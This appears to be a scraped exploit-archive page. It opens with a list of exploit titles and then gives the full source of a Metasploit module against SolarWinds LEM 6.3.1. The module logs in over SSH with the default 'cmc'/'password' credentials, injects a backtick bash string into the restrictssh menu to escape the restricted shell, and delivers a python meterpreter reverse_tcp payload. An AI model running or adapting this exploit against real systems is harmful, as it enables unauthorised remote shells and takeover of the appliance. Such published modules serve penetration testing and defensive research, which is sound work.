6624e39c26
31 new exploits macOS/iOS Kernel 10.12.3 (16D32) - 'bpf' Heap Overflow macOS/iOS Kernel 10.12.3 (16D32) - SIOCGIFORDER Socket ioctl Off-by-One Memory Corruption macOS Kernel 10.12.2 (16C67) - Memory Disclosure Due to Lack of Bounds Checking in AppleIntelCapriController::getDisplayPipeCapability macOS Kernel 10.12.3 (16D32) - Use-After-Free Due to Double-Release in posix_spawn macOS/iOS Kernel 10.12.3 (16D32) - SIOCSIFORDER Socket ioctl Memory Corruption Due to Bad Bounds Checking macOS Kernel 10.12.3 (16D32) - 'audit_pipe_open' Off-by-One Memory Corruption macOS/iOS Kernel 10.12.3 (16D32) - Bad Locking in necp_open Use-After-Free macOS Kernel 10.12.2 (16C67) - 'AppleIntelCapriController::GetLinkConfig' Code Execution Due to Lack of Bounds Checking Broadcom Wi-Fi SoC - Heap Overflow in _wlc_tdls_cal_mic_chk_ Due to Large RSN IE in TDLS Setup Confirm Frame Apple WebKit 10.0.2 - HTMLInputElement Use-After-Free Apple WebKit - 'RenderLayer' Use-After-Free Apple WebKit - Negative-Size memmove in HTMLFormElement Apple WebKit - 'FormSubmission::create' Use-After-Free Apple WebKit - 'ComposedTreeIterator::traverseNextInShadowTree' Use-After-Free Apple WebKit - 'table' Use-After-Free Apple WebKit - 'WebCore::toJS' Use-After-Free macOS/iOS Kernel 10.12.3 (16D32) - Double-Free Due to Bad Locking in fsevents Device Bluecoat ASG 6.6/CAS 1.3 - Privilege Escalation (Metasploit) Bluecoat ASG 6.6/CAS 1.3 - OS Command Injection (Metasploit) Broadcom Wi-Fi SoC - TDLS Teardown Request Remote Heap Overflow Exploit SolarWinds LEM 6.3.1 - Remote Code Execution (Metasploit) Logsign 4.4.2 / 4.4.137 - Remote Command Injection (Metasploit) Broadcom Wi-Fi SoC - 'dhd_handle_swc_evt' Heap Overflow Pixie 1.0.4 - Arbitrary File Upload Apple Webkit - Universal Cross-Site Scripting by Accessing a Named Property from an Unloaded Window Apple WebKit 10.0.2(12602.3.12.0.1) - 'disconnectSubframes' Universal Cross-Site Scripting Apple WebKit 10.0.2(12602.3.12.0.1_ r210800) - 'constructJSReadableStreamDefaultReader' Type Confusion Apple WebKit 10.0.2(12602.3.12.0.1) - 'Frame::setDocument (1)' Universal Cross-Site Scripting Apple Webkit - 'JSCallbackData' Universal Cross-Site Scripting Maian Uploader 4.0 - 'index.php' keywords Parameter Cross-Site Scripting Maian Uploader 4.0 - admin/index.php keywords Parameter Cross-Site Scripting Maian Uploader 4.0 - admin/inc/header.php Multiple Parameter Cross-Site Scripting Maian Uploader 4.0 - 'keywords' Parameter Cross-Site Scripting Maian Uploader 4.0 - 'index.php' Cross-Site Scripting Maian Uploader 4.0 - 'header.php' Cross-Site Scripting Maian Uploader 4.0 - 'user' Parameter SQL Injection Maian Survey 1.1 - 'survey' Parameter SQL Injection Maian Greetings 2.1 - 'cat' Parameter SQL Injection
164 lines
5.3 KiB
Ruby
Executable file
164 lines
5.3 KiB
Ruby
Executable file
##
|
|
# This module requires Metasploit: http://metasploit.com/download
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
##
|
|
|
|
class MetasploitModule < Msf::Exploit::Remote
|
|
Rank = ExcellentRanking
|
|
|
|
include Msf::Exploit::Remote::SSH
|
|
|
|
def initialize(info={})
|
|
super(update_info(info,
|
|
'Name' => "SolarWind LEM Default SSH Password Remote Code Execution",
|
|
'Description' => %q{
|
|
This module exploits the default credentials of SolarWind LEM. A menu system is encountered when the SSH
|
|
service is accessed with the default username and password which is "cmc" and "password". By exploiting a
|
|
vulnerability that exist on the menuing script, an attacker can escape from restricted shell.
|
|
|
|
This module was tested against SolarWinds LEM v6.3.1.
|
|
},
|
|
'License' => MSF_LICENSE,
|
|
'Author' =>
|
|
[
|
|
'Mehmet Ince <mehmet@mehmetince.net>', # discovery & msf module
|
|
],
|
|
'References' =>
|
|
[
|
|
['URL', 'http://pentest.blog/unexpected-journey-4-escaping-from-restricted-shell-and-gaining-root-access-to-solarwinds-log-event-manager-siem-product/']
|
|
],
|
|
'DefaultOptions' =>
|
|
{
|
|
'Payload' => 'python/meterpreter/reverse_tcp',
|
|
},
|
|
'Platform' => ['python'],
|
|
'Arch' => ARCH_PYTHON,
|
|
'Targets' => [ ['Automatic', {}] ],
|
|
'Privileged' => false,
|
|
'DisclosureDate' => "Mar 17 2017",
|
|
'DefaultTarget' => 0
|
|
))
|
|
|
|
register_options(
|
|
[
|
|
Opt::RPORT(32022),
|
|
OptString.new('USERNAME', [ true, 'The username for authentication', 'cmc' ]),
|
|
OptString.new('PASSWORD', [ true, 'The password for authentication', 'password' ]),
|
|
]
|
|
)
|
|
|
|
register_advanced_options(
|
|
[
|
|
OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
|
|
OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
|
|
]
|
|
)
|
|
end
|
|
|
|
def rhost
|
|
datastore['RHOST']
|
|
end
|
|
|
|
def rport
|
|
datastore['RPORT']
|
|
end
|
|
|
|
def username
|
|
datastore['USERNAME']
|
|
end
|
|
|
|
def password
|
|
datastore['PASSWORD']
|
|
end
|
|
|
|
def exploit
|
|
factory = ssh_socket_factory
|
|
opts = {
|
|
:auth_methods => ['keyboard-interactive'],
|
|
:port => rport,
|
|
:use_agent => false,
|
|
:config => false,
|
|
:password => password,
|
|
:proxy => factory,
|
|
:non_interactive => true
|
|
}
|
|
|
|
opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
|
|
|
|
print_status("#{rhost}:#{rport} - Attempting to login...")
|
|
|
|
begin
|
|
ssh = nil
|
|
::Timeout.timeout(datastore['SSH_TIMEOUT']) do
|
|
ssh = Net::SSH.start(rhost, username, opts)
|
|
end
|
|
rescue Rex::ConnectionError
|
|
return
|
|
rescue Net::SSH::Disconnect, ::EOFError
|
|
print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
|
|
return
|
|
rescue ::Timeout::Error
|
|
print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
|
|
return
|
|
rescue Net::SSH::AuthenticationFailed
|
|
print_error "#{rhost}:#{rport} SSH - Failed authentication due wrong credentials."
|
|
rescue Net::SSH::Exception => e
|
|
print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
|
|
return
|
|
end
|
|
|
|
if ssh
|
|
payload_executed = false
|
|
print_good("SSH connection is established.")
|
|
|
|
ssh.open_channel do |channel|
|
|
print_status("Requesting pty... We need it in order to interact with menuing system.")
|
|
|
|
channel.request_pty do |ch, success|
|
|
raise ::RuntimeError, "Could not request pty!" unless success
|
|
print_good("Pty successfully obtained.")
|
|
|
|
print_status("Requesting a shell.")
|
|
ch.send_channel_request("shell") do |ch, success|
|
|
raise ::RuntimeError, "Could not open shell!" unless success
|
|
print_good("Remote shell successfully obtained.")
|
|
end
|
|
end
|
|
|
|
channel.on_data do |ch, data|
|
|
if data.include? "cmc "
|
|
print_good("Step 1 is done. Managed to access terminal menu.")
|
|
channel.send_data("service\n")
|
|
end
|
|
|
|
if data.include? "service "
|
|
print_good("Step 2 is done. Managed to select 'service' sub menu.")
|
|
channel.send_data("restrictssh\n")
|
|
end
|
|
|
|
if data.include? "Press <enter> to configure restriction on the SSH service to the Manager Appliance"
|
|
print_good("Step 3 is done. Managed to start 'restrictssh' function.")
|
|
channel.send_data("*#`bash>&2`\n")
|
|
end
|
|
|
|
if data.include? "Are the hosts"
|
|
print_good("Step 4 is done. We are going to try escape from jail shell.")
|
|
channel.send_data("Y\n")
|
|
end
|
|
|
|
if data.include? "/usr/local/contego"
|
|
if payload_executed == false
|
|
print_good("Sweet..! Escaped from jail.")
|
|
print_status("Delivering payload...")
|
|
channel.send_data("python -c \"#{payload.encoded}\"\n")
|
|
payload_executed = true
|
|
end
|
|
end
|
|
|
|
end
|
|
end
|
|
ssh.loop unless session_created?
|
|
end
|
|
end
|
|
|
|
end
|